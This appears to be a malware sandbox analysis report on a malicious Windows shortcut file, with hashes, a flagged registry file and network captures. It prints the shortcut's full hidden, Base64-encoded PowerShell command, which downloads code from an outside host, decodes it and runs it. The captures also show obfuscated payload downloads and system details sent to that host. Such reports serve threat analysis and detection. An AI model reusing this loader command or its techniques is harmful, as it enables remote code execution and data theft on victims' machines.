Entropy (8bit):	3.878036153732651
Encrypted:	false
SSDEEP:	6144:KEcXiBNLsfNeeD61SRawazmRnLekXEij/OnWRo1Yr+5i6bhHLhMTUA28yIGpZd:KEcXiBqfNeeD6qawazmRnLekXSSo/h
MD5:	DF36ADAC81400E37841C6190F3604924
SHA1:	D4C98FEB59E850EDE41E8522CBC0549707832DA2
SHA-256:	9F20A13DF74ECC2AAB37C5C407E2B252F624E6B875DA32EDCF5886DF164ED43E
SHA-512:	60DFF03AB42C8866F3D5A2ECE57F2DFB4F7945BFF72A56748B63C6B0200F0D86CD6E64BE6A832E4A9FDA58688E80BEF705E02081A0821108E497B505E18F1619
Malicious:	false
Preview:	..E(....................;._....................................$.$.G.l.o.b.a.l.$.$......my......................\.....Z...0...+.0.J.f.p.q.U.8.x.J.e.Y.n.Z.J.W.G.k.L.b.7.o./.C.D.+.A.J.9.U.P.y.A.e.m.R.4.2.m.F.n.1.s.=...........E(......................j.............................Z.......+.2.e.7.W.B.7.f.+.F.7.k.k.4.M.y.C.N.s.p.j.x.r.8.T.7.W.H.q.u.k.M.w.4.H.5.C.o.m.q.c.L.Q.=..........R2H....................Uz(.....................(5X.........D...O.f.f.i.c.e. .1.9.,. .T.I.M.E.B.A.S.E.D._.E.V.A.L. .c.h.a.n.n.e.l...............Z...0...+.4.R.6.u.F.1.m.q./.B.3.W.x.J.e./.F.6.Z.l.g.e.6.z.r.T.5.4.N.8.w.2.l.8.S.Q.Q.3.y.p.L.Q.=...........E(......................j.....................8..=....Z.......+.5.9.4.3.l.j.l.G.R.C.2.b.R.G.h.s.Y.q.K.N.O.g.0.3.U.y.s.i.K.c.w.b.c.a.T.k.W.2.V.f.N.4.=..........R2H....................Uz(......................PPu............!.......J...J...e.d.e.a.3.f.0.d.-.b.a.5.4.-.4.2.a.d.-.a.7.7.f.-.3.d.8.7.e.5.0.0.a.0.0.3.........e.d.e.a.3.f.0.d.-.b.a.5.4.-.4.2.a.d.-.a.7.7.f.-.

Process:	C:\Windows\regedit.exe
File Type:	Windows Registry little-endian text (Win2K or above)
Category:	dropped
Size (bytes):	5492
Entropy (8bit):	3.2564408602149646
Encrypted:	false
SSDEEP:	96:0PVJqMXWMRUYSFd5YtU6W66zpVwkP9Odgd8zkFJdlzOkJdB0u1Jd8ui4c4d8zB/H:sVJqgUZ/5+g7P94RgFx9R43Zy1TbZH56
MD5:	A766DECEF71813234AAF41DB4EF5086E
SHA1:	564473B1CB74ED13E820C62F30642836B8D983C6
SHA-256:	8CA780CD4F6488CBBB1B6999D935B4F8352B36B3E2E1E54301875C6483A87535
SHA-512:	C3CF7BADAD40C63C0479DD7A50762968038A9D402E8AE34697F30D09E206D5D090270013504B801EECB82D234280535E21629A6F23F1F04CE1CF2D3EF0C37051
Malicious:	true
Preview:	..W.i.n.d.o.w.s. .R.e.g.i.s.t.r.y. .E.d.i.t.o.r. .V.e.r.s.i.o.n. .5...0.0.........[.H.K.E.Y._.L.O.C.A.L._.M.A.C.H.I.N.E.\.S.Y.S.T.E.M.\.C.u.r.r.e.n.t.C.o.n.t.r.o.l.S.e.t.\.S.e.r.v.i.c.e.s.\.T.e.r.m.S.e.r.v.i.c.e.].....".D.e.p.e.n.d.O.n.S.e.r.v.i.c.e.".=.h.e.x.(.7.).:.5.2.,.0.0.,.5.0.,.0.0.,.4.3.,.0.0.,.5.3.,.0.0.,.5.3.,.0.0.,.0.0.,.0.0.,.0.0.,.0.0.....".D.e.s.c.r.i.p.t.i.o.n.".=.".@.%.S.y.s.t.e.m.R.o.o.t.%.\.\.S.y.s.t.e.m.3.2.\.\.t.e.r.m.s.r.v...d.l.l.,.-.2.6.7.".....".D.i.s.p.l.a.y.N.a.m.e.".=.".@.%.S.y.s.t.e.m.R.o.o.t.%.\.\.S.y.s.t.e.m.3.2.\.\.t.e.r.m.s.r.v...d.l.l.,.-.2.6.8.".....".E.r.r.o.r.C.o.n.t.r.o.l.".=.d.w.o.r.d.:.0.0.0.0.0.0.0.1.....".F.a.i.l.u.r.e.A.c.t.i.o.n.s.".=.h.e.x.:.8.0.,.5.1.,.0.1.,.0.0.,.0.0.,.0.0.,.0.0.,.0.0.,.0.0.,.0.0.,.0.0.,.0.0.,.0.3.,.0.0.,.0.0.,.0.0.,.1.4.,.0.0.,.0.0.,.\..... . .0.0.,.0.1.,.0.0.,.0.0.,.0.0.,.6.0.,.e.a.,.0.0.,.0.0.,.0.1.,.0.0.,.0.0.,.0.0.,.6.0.,.e.a.,.0.0.,.0.0.,.0.0.,.0.0.,.0.0.,.0.0.,.6.0.,.e.a.,.0.0.,.0.0.....".I.m.a.g.e.P.a.t.h.".=.h.e.x.

File type:	MS Windows shortcut, Has Working directory, Has command line arguments, Icon number=151, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
Entropy (8bit):	1.9855036287704013E-4
TrID:	Windows Shortcut (20020/1) 100.00%
File name:	ny.lnk.d.lnk
File size:	80'740'352 bytes
MD5:	6c28ee9da90d10710faecafc3bae173b
SHA1:	ad12270b640f388c27dcd071f163ea636ca4709c
SHA256:	e2e84b65af1fc49bdfa5d3c3a0793cf7632af91511aa8c16797770aabb5d6a99
SHA512:	a428702b63a17c910c784e2ae8c746a3e5eef0354b9e19b8bf21d46f8cc033fdb044592355d3384b6ea762ebefe90da593f28ef485394b1a2d7cdcf864f14e83
SSDEEP:	48:8aUKAgXB5G7y0BBQHtIp4w62RkDkpQdkSmflInx4OqI:85gx07y0BB+tulC4XNflwOh
TLSH:	23082C402DEE40CDF2636B795BE8F6BA01A7F4B4592EA1F9118085594B71EC09473BB1
File Content Preview:	L..................F.B............................................................/.c. .".S.T.a.R.T. ./.M.i.N. .".". .P.O.w.e.r.S.h.E.l.L. .-.W.I.n.d.o.w.S.t.Y.L.e. .H.I.d.d.E.n. .-.E.n.C.o.D.e.D.C.O.M.m.a.n.d. .".S.Q.B.F.A.F.g.A.I.A.A.o.A.F.s.A.V.A.B.F.A

General
Relative Path:
Command Line Argument:	/c "STaRT /MiN "" POwerShElL -WIndowStYLe HIddEn -EnCoDeDCOMmand "SQBFAFgAIAAoAFsAVABFAHgAdAAuAEUAbgBDAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AFIASQBOAEcAKAAoAEkAVwByACAAIgBoAHQAdABwAHMAOgAvAC8AYQBrAGEAZABlAG0AaQBpAGkAaQBpAGkAaQBpAC4AbwBuAGwAaQBuAGUALwB0AC8ANgBkAGUAZgA2ADcAYgBkADUAOAAzADEAOABhADUAOQAzADgAMwBiAGIAMAA2ADkAMwA5ADUAYgA0ADkANwBiADEAMwBiADEAZQBlADMAYgBjADMAOQAzAGIAOABjAGYAOAAzADYANQA2AGMANABjAGQANwBkADIAMwAzADUAMQAiACkALgBDAE8AbgB0AEUAbgB0AC4ARgBPAFIARQBhAGMASAAoAHsAJABfACAALQBCAFgAbwBSACAAMQB9ACkAKQApAA=="" && exit
Icon location:	%SystemRoot%\System32\imageres.dll

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 19, 2024 14:23:47.281097889 CET	52822	53	192.168.11.20	1.1.1.1
Dec 19, 2024 14:23:47.458697081 CET	53	52822	1.1.1.1	192.168.11.20

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 14:23:49.274730921 CET	316	OUT	POST /3c1ed67e6bcb889b2bab4f8985b0a37595dcd4df24866793b5267ba406479d835daa8b68ca03e3a6e91f8afeb39805d8 HTTP/1.1 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: akademiiiiiiii.online Content-Length: 177 Connection: Keep-Alive
Dec 19, 2024 14:23:49.409715891 CET	177	OUT	Data Raw: 5b 0d 0a 20 20 20 20 22 5c 22 62 65 67 69 6e 20 64 6f 77 6e 6c 6f 61 64 20 68 74 74 70 3a 2f 2f 61 6b 61 64 65 6d 69 69 69 69 69 69 69 69 2e 6f 6e 6c 69 6e 65 2f 74 2f 36 66 35 62 32 38 66 35 36 37 36 31 38 62 62 37 62 34 38 64 63 31 38 61 32 62 Data Ascii: [ "\"begin download http://akademiiiiiiii.online/t/6f5b28f567618bb7b48dc18a2b5751f5791a04bac2764be3c8ead50796e3f23dacb85e6f8a1ac315e86009a6c37fef73\"", "----------"]
Dec 19, 2024 14:23:49.868125916 CET	976	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 13:23:49 GMT Content-Length: 0 Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=imnws1osXWwfZ7HvNdabRW0HiysDfG7JsnOcvdlzV%2BGX0f9Cow19hI0FOaH6melOhOLBDhVrcSuIwdyH6NF11fVCbS0%2FPv0vLuoPYl9fwQwQkRi6VQE9aNZ2vnuTHnrjF8SdfULt1qEO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=8527&min_rtt=1389&rtt_var=14798&sent=5&recv=7&lost=0&retrans=0&sent_bytes=963&recv_bytes=2644&delivery_rate=24958&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f47b5996a8832e3-JAX server-timing: cfL4;desc="?proto=TCP&rtt=134825&min_rtt=134825&rtt_var=67412&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=493&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Dec 19, 2024 14:23:49.903834105 CET	240	OUT	GET /t/6f5b28f567618bb7b48dc18a2b5751f5791a04bac2764be3c8ead50796e3f23dacb85e6f8a1ac315e86009a6c37fef73 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: akademiiiiiiii.online
Dec 19, 2024 14:23:50.373306990 CET	1289	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 13:23:50 GMT Content-Type: application/octet-stream Content-Length: 2493 Connection: keep-alive Cache-Control: no-store,no-cache Pragma: no-cache content-disposition: attachment; filename=image; filename*=UTF-8''image cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MO4n7zRcXJ0yZVNGVxpROJ5jRsNxd1lgbh5mxYkBRpuM07jhBJ0WB3duZyikxZPrJ%2B%2F8b%2BuxsZCoC3V9HbppXKS3EM0IcR04mdMPl330zwOuLtzaV0W60D5QsRAKzze9qHoZhnXflOLg"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=16566&min_rtt=1389&rtt_var=23367&sent=10&recv=11&lost=0&retrans=0&sent_bytes=2483&recv_bytes=4256&delivery_rate=58225&cwnd=252&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f47b59d5fa532e3-JAX server-timing: cfL4;desc="?proto=TCP&rtt=139283&min_rtt=134825&rtt_var=59476&sent=4&recv=5&lost=0&retrans=0&sent_bytes=976&recv_bytes=733&delivery_rate=7560&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 67 74 6f 62 75 68 6e 6f 21 52 64 6f 65 2c 42 6e 6c 71 74 75 64 73 48 6f 67 6e 21 7a 0b 21 21 21 21 71 60 73 60 6c 21 29 0b 21 21 21 21 21 21 21 21 5a 72 75 73 68 6f 66 5c 25 74 73 6d 0b 21 21 21 21 28 0b 21 21 21 21 0b 21 21 21 21 25 73 60 6c 21 3c 21 46 64 75 2c 42 68 6c 48 6f 72 75 60 6f 62 64 21 2c 42 6d 60 72 72 4f 60 6c 64 21 56 68 6f 32 33 5e 51 69 78 72 68 62 60 6d 4c 64 6c 6e 73 78 21 7d 21 Data Ascii: gtobuhno!Rdoe,BnlqtudsHogn!z!!!!q`s`l!)!!!!!!!!Zrushof\%tsm!!!!(!!!!!!!!%s`l!<!Fdu,BhlHoru`obd!,Bm`rrO`ld!Vho23^Qixrhb`mLdlnsx!}!
Dec 19, 2024 14:23:50.373542070 CET	1289	IN	Data Raw: 4c 64 60 72 74 73 64 2c 4e 63 6b 64 62 75 21 2c 51 73 6e 71 64 73 75 78 21 42 60 71 60 62 68 75 78 21 2c 52 74 6c 0b 21 21 21 21 25 73 60 6c 46 43 21 3c 21 5a 6c 60 75 69 5c 3b 3b 73 6e 74 6f 65 29 25 73 60 6c 2f 52 74 6c 21 2e 21 30 46 43 2d 21 Data Ascii: Ld`rtsd,Nckdbu!,Qsnqdsux!B`q`bhux!,Rtl!!!!%s`lFC!<!Zl`ui\;;sntoe)%s`l/Rtl!.!0FC-!3(!!!!!!!!%trdso`ld!<!%dow;TRDSO@LD!!!!!!!!%ehrj!<!Fdu,BhlHoru`obd!,Bm`rrO`ld!Vho23^Mnfhb`mEhrj!,Ghmuds!#EshwdUxqd<2#!!!!%ehrjHogn!<!%ehrj!}!GnsD`bi,Nckdbu!
Dec 19, 2024 14:23:50.373575926 CET	1070	IN	Data Raw: 71 73 6e 62 64 72 72 42 6e 74 6f 75 21 3c 21 29 46 64 75 2c 51 73 6e 62 64 72 72 28 2f 62 6e 74 6f 75 0b 21 21 21 21 0b 21 21 21 21 25 62 6e 6c 71 74 75 64 73 48 6f 67 6e 21 3c 21 5a 51 52 42 74 72 75 6e 6c 4e 63 6b 64 62 75 5c 41 7a 0b 21 21 21 Data Ascii: qsnbdrrBntou!<!)Fdu,Qsnbdrr(/bntou!!!!!!!!%bnlqtudsHogn!<!ZQRBtrunlNckdbu\Az!!!!!!!!S@L!<!%s`lFC!!!!!!!!Bnsd!<!%bqtBnsdr!!!!!!!!Trdso`ld!<!%trdso`ld!!!!!!!!BnlqtudsO`ld!<!%bnlqtudsO`ld!!!!!!!!EhrjHogn!<!A)%ehrjHogn(!!!!!!!!VhoenvrWdsrh
Dec 19, 2024 14:23:51.960608959 CET	295	OUT	POST /t/897605e002d48fed977a6a5b9d4706b7bbd31df6c8a9bfd969709d2e0e4b69df4f41c2d72b187c25b9e6b90cbad4ddc4 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Content-Type: application/json Host: akademiiiiiiii.online Content-Length: 1206
Dec 19, 2024 14:23:52.100944042 CET	1206	OUT	Data Raw: 7b 0d 0a 20 20 20 20 22 52 41 4d 22 3a 20 20 31 36 2c 0d 0a 20 20 20 20 22 43 6f 72 65 22 3a 20 20 38 2c 0d 0a 20 20 20 20 22 55 73 65 72 6e 61 6d 65 22 3a 20 20 22 41 72 74 68 75 72 22 2c 0d 0a 20 20 20 20 22 43 6f 6d 70 75 74 65 72 4e 61 6d 65 Data Ascii: { "RAM": 16, "Core": 8, "Username": "user", "ComputerName": "701188", "DiskInfo": [ { "DriveLetter": "C:", "SizeGB": 476.31,
Dec 19, 2024 14:23:52.552007914 CET	1289	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 13:23:52 GMT Content-Type: application/octet-stream Content-Length: 18804 Connection: keep-alive content-disposition: attachment; filename=image; filename*=UTF-8''image cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CqLp2zeC6j%2FtYKZDKpnrdtEPQzehaX38pOzpBVc0oOMGHq5Trt0L1tBkdg3b34T2adiYPxaFpnKaRUaS7eSbyWkwOj0Yce%2Bln3WeUVhfqLP97BJn8slYnijxKBpAUycFlE1xY1KFCXr2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=7625&min_rtt=950&rtt_var=11199&sent=4311&recv=1892&lost=0&retrans=0&sent_bytes=6052936&recv_bytes=18136&delivery_rate=38614345&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f47b5aa388632e3-JAX server-timing: cfL4;desc="?proto=TCP&rtt=138771&min_rtt=134825&rtt_var=45632&sent=9&recv=8&lost=0&retrans=0&sent_bytes=4624&recv_bytes=2234&delivery_rate=28605&cwnd=253&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 25 73 77 6d 78 77 76 78 66 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 56 57 65 32 4f 6c 4c 78 55 6c 6d 60 52 47 5b 70 58 6a 62 30 63 57 6d 71 4f 59 4f 60 57 7b 57 74 5b 44 65 6f 5b 31 79 59 5b 45 43 4b 53 44 57 76 53 47 47 77 5b 31 6d 45 50 56 65 6d 65 7b 43 4d 52 54 4f 43 5b 31 6d 45 50 56 65 4b 52 46 53 34 58 57 69 52 63 44 79 59 60 Data Ascii: %swmxwvxf<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#VWe2OlLxUlm`RG[pXjb0cWmqOYO`W{Wt[Deo[1yY[ECKSDWvSGGw[1mEPVeme{CMRTOC[1mEPVeKRFS4XWiRcDyY`
Dec 19, 2024 14:23:52.552017927 CET	1289	IN	Data Raw: 49 5b 6b 4c 30 47 6f 52 56 34 4e 63 46 4b 75 54 56 65 68 53 7b 6d 74 52 56 71 7b 55 6a 4f 71 50 56 65 4b 50 31 47 6f 52 54 4f 42 63 56 44 78 64 46 75 5b 4c 6c 66 76 5b 45 48 30 63 31 38 32 4c 44 75 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 48 5b 49 6d Data Ascii: I[kL0GoRV4NcFKuTVehS{mtRVq{UjOqPVeKP1GoRTOBcVDxdFu[Llfv[EH0c182LDuKP1GoRTOC[1mH[ImiVGKrUGenelL{TVeKcT4{VmeFdTmIdI[`dTj2SGGw[1mEPVeKP1GoRjejb3HxRlihSIC7VUKJ`3SYUoOhcWqqRTPv[0GE[2CQe{CMRTOC[1mHLD4E[{CMSGGw[1mEPVeDTY@4SGGw`jSSc3qKS{m2Vmb0S3GYdFyL
Dec 19, 2024 14:23:52.552026033 CET	1289	IN	Data Raw: 62 34 4c 33 4b 75 64 49 5b 5b 57 30 47 6f 52 6a 65 60 62 46 4b 49 57 6d 47 5b 56 47 4b 77 52 56 71 7b 55 6a 4f 71 50 56 65 4b 50 31 47 70 52 54 57 4e 63 30 71 59 55 6f 4b 4b 53 33 79 75 52 54 69 52 63 30 71 55 50 6c 30 69 57 32 69 72 52 54 65 56 Data Ascii: b4L3KudI[[W0GoRje`bFKIWmG[VGKwRVq{UjOqPVeKP1GpRTWNc0qYUoKKS3yuRTiRc0qUPl0iW2irRTeVOFGXUkCke{CMRTOC[1mIcF0KP3e1Xl14LDmE`GW`VD5vUG[B`FSI[3eLWjKn[Deo[1qIVoChS0[SVWiRc1uU`3eme{CMRTOC[1mEPVeKP1KwXkH0elWHUoimclP1RTOJS3GYdFyKS0K3VmiO[3KuNUCKS0X1XWiNL
Dec 19, 2024 14:23:52.552046061 CET	1289	IN	Data Raw: 6a 53 33 79 33 58 6c 6d 42 53 56 48 7b 5b 49 57 68 53 7b 6d 6e 56 6a 4c 79 53 33 47 59 64 46 79 52 63 6a 71 33 58 6d 5b 56 64 56 4b 45 50 6b 65 44 54 56 38 6f 52 54 4f 43 5b 33 4f 49 53 6f 6d 5b 57 7b 43 6f 52 31 44 76 52 31 6d 45 50 56 65 4b 50 Data Ascii: jS3y3XlmBSVH{[IWhS{mnVjLyS3GYdFyRcjq3Xm[VdVKEPkeDTV8oRTOC[3OISom[W{CoR1DvR1mEPVeKP1GoRTOBXlL{TomiW{WtVGORWlOue2ODTV8oRTOC[1mEPVeKSoS7[DiJbFKu[FSJSWKrX{ORbFKuSkCiW{m0SGGw[1mEPVeMTUCMSGGw[1mEPVeJS143[Gb0LDmDLFeOWDD2SGGw[1mEPVejLlivXjeWc1qIUo[jW{
Dec 19, 2024 14:23:52.552053928 CET	1289	IN	Data Raw: 65 33 53 58 54 6a 65 69 57 32 69 72 57 54 65 46 4c 46 47 45 65 31 34 45 5b 7b 43 4d 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 4b 68 56 56 34 72 4c 47 71 56 4c 46 75 59 53 7b 6d 34 54 7b 4b 56 4f 54 6d 44 4c 46 65 4f 54 55 43 4d 52 54 4f 43 5b 31 Data Ascii: e3SXTjeiW2irWTeFLFGEe14E[{CMRTOC[1mEPVeKP1KhVV4rLGqVLFuYS{m4T{KVOTmDLFeOTUCMRTOC[1mE`14E[{CMSGGw[1mEPVejRDn0RTi{UjOqPVeKP1GoRTOC[1m4PmO`W1[sRTiRc0qUPl0iW2irRTereVSINFe[T1Kq[WiRcDmISomkcTX0SGGw[1mEPVeKP1GoRTORcVGYdFySclvvVmiO[0CUPlKWL3y7[DeVeDy
Dec 19, 2024 14:23:52.552249908 CET	1289	IN	Data Raw: 7b 43 4d 56 6c 34 56 65 57 6a 7b 54 6f 43 68 4c 6b 53 6f 57 6a 65 56 64 6c 53 45 4c 57 57 60 57 7b 47 32 54 6c 30 72 62 30 71 57 57 6b 53 69 56 44 35 76 58 7b 43 46 65 57 71 47 54 6c 79 68 53 30 58 76 56 6d 4f 42 4f 31 53 53 63 33 65 4b 50 31 47 Data Ascii: {CMVl4VeWj{ToChLkSoWjeVdlSELWW`W{G2Tl0rb0qWWkSiVD5vX{CFeWqGTlyhS0XvVmOBO1SSc3eKP1GoX1eFdWmYLFeMPUCMRTOC[1mEPVeKP1KhX{ORdVGYOV4XT0KIXWe5cGSuSoS`T1D4RTOJcFKXPkCmT{Tv[TiS`TyEPVeDTV8oRTOC[1mEPVeKSoSvXl4R[DqFToChW0[3[GiRWGqYUo[hcWK7RTPv[14pPVeKP1Go
Dec 19, 2024 14:23:52.552309036 CET	1289	IN	Data Raw: 71 55 50 6f 43 68 60 54 47 73 5b 44 65 56 65 46 4f 47 56 6f 5b 68 53 30 4b 72 58 33 6a 31 65 54 79 71 52 54 34 45 5b 7b 43 4d 52 54 4f 43 5b 31 6d 48 5b 46 38 69 57 32 69 72 52 54 4f 6f 63 31 71 49 4f 56 79 6a 4c 57 4b 76 58 6d 65 57 5b 31 79 55 Data Ascii: qUPoCh`TGs[DeVeFOGVo[hS0KrX3j1eTyqRT4E[{CMRTOC[1mH[F8iW2irRTOoc1qIOVyjLWKvXmeW[1yUPVukL0KnX34RWVGYLVyMT{WWXkOR`FKFUly[Lkm0VjiO[1yYdECKP0KWXWbycFH{WkCWLm[pXkH0`3O4`3eme{CMRTOC[1mEPVeKP1KvVlmCc0[IWoqjP{GSVWiRc1mELWG[VGKwRTORcVGYdFyWS1XvXTOs[3W2L
Dec 19, 2024 14:23:53.116920948 CET	291	OUT	POST /3c1ed67e6bcb889b2bab4f8985b0a37595dcd4df24866793b5267ba406479d836a933a49096f87bb408aa2e2d2d69dbf HTTP/1.1 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: akademiiiiiiii.online Content-Length: 85
Dec 19, 2024 14:23:53.946512938 CET	993	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 13:23:53 GMT Content-Length: 0 Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F69fK6f9fZaE4ETMc0VNKysNRlalHmE2qYIW1eOKDLbw35WjuwSb7ygE8g4T3lcx3xeXwUax8UG4zCqcMkct0%2BYCw0RVPUSIbva7X0XDsi8%2F%2F6TBGkudLNWm%2Bp6Gtg74sXYVXtQGYIfn"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=9510&min_rtt=2645&rtt_var=14723&sent=5&recv=7&lost=0&retrans=0&sent_bytes=753&recv_bytes=1727&delivery_rate=25360&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f47b5b1690132e3-JAX server-timing: cfL4;desc="?proto=TCP&rtt=136799&min_rtt=134617&rtt_var=9995&sent=27&recv=16&lost=0&retrans=0&sent_bytes=24542&recv_bytes=2610&delivery_rate=151078&cwnd=256&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Dec 19, 2024 14:23:53.989391088 CET	291	OUT	POST /3c1ed67e6bcb889b2bab4f8985b0a37595dcd4df24866793b5267ba406479d836a933a49096f87bb408aa2e2d2d69dbf HTTP/1.1 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: akademiiiiiiii.online Content-Length: 62
Dec 19, 2024 14:23:54.574091911 CET	994	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 13:23:54 GMT Content-Length: 0 Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qjGEdWbJB6id0qLmL5%2F2LlMciplMJ9hCyrVuue5UftG35Llkj5DFIU7ySTAHEWO2U%2F1nnsuNfMvVupi6HPqCZZxI0Kf78NpQ9EnFyhDVOcfdB4CL60b3AiARAn3qxSh%2BGetqRaCOd3Oh"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=28285&min_rtt=2645&rtt_var=29363&sent=17&recv=18&lost=0&retrans=0&sent_bytes=3817&recv_bytes=5506&delivery_rate=29918&cwnd=254&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f47b5b6ef2d32e3-JAX server-timing: cfL4;desc="?proto=TCP&rtt=141899&min_rtt=134617&rtt_var=17696&sent=30&recv=18&lost=0&retrans=0&sent_bytes=25535&recv_bytes=2963&delivery_rate=151078&cwnd=256&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 14:23:54.803565979 CET	264	OUT	GET /t/7dfed9d6c790d0068121e3be7e2647c45f0e8b505415e6d80e64e63c4ebab118a2e4b6b4f36140f511645c3d908de349 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: akademiiiiiiii.online Connection: Keep-Alive
Dec 19, 2024 14:23:55.514692068 CET	1289	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 13:23:55 GMT Content-Type: application/octet-stream Content-Length: 3262 Connection: keep-alive Cache-Control: no-store,no-cache Pragma: no-cache content-disposition: attachment; filename=file; filename*=UTF-8''file cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NmuwYaEpkZiDry0soFuVMI7NSLmZ96sa3XPIJPKENAvN7goHM885h6lXc0xGIKF26YMG%2F7DPYGYwiNAm%2FBDrlNLoVqvI17y197ZCLQAL%2FFAKxMTRJXM04%2BBdYDYb4bCxAoEloW0xFD8J"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=26112&min_rtt=1789&rtt_var=31222&sent=23&recv=23&lost=0&retrans=0&sent_bytes=8763&recv_bytes=6987&delivery_rate=2438752&cwnd=256&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8f47b5bbffed68cc-JAX server-timing: cfL4;desc="?proto=TCP&rtt=135883&min_rtt=135883&rtt_var=67941&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=264&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 50 4b 03 04 14 00 08 00 08 00 26 b2 90 59 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 00 00 5f 72 65 6c 73 2f 2e 72 65 6c 73 8d 8f 3b 0e c2 30 10 44 af 62 6d 4f 36 50 20 84 e2 a4 41 48 69 a3 70 00 cb de 38 51 e2 8f 6c f3 bb 3d 2e 28 08 a2 a0 1c ed cc db 99 aa 79 98 85 dd 28 c4 c9 59 0e db a2 04 46 56 3a 35 59 cd e1 d2 9f 37 07 68 ea aa a3 45 a4 ec 88 e3 e4 23 cb 11 1b 39 8c 29 f9 23 62 94 23 19 11 0b e7 c9 e6 Data Ascii: PK&Y_rels/.rels;0DbmO6P AHip8Ql=.(y(YFV:5Y7hE#9)#b#
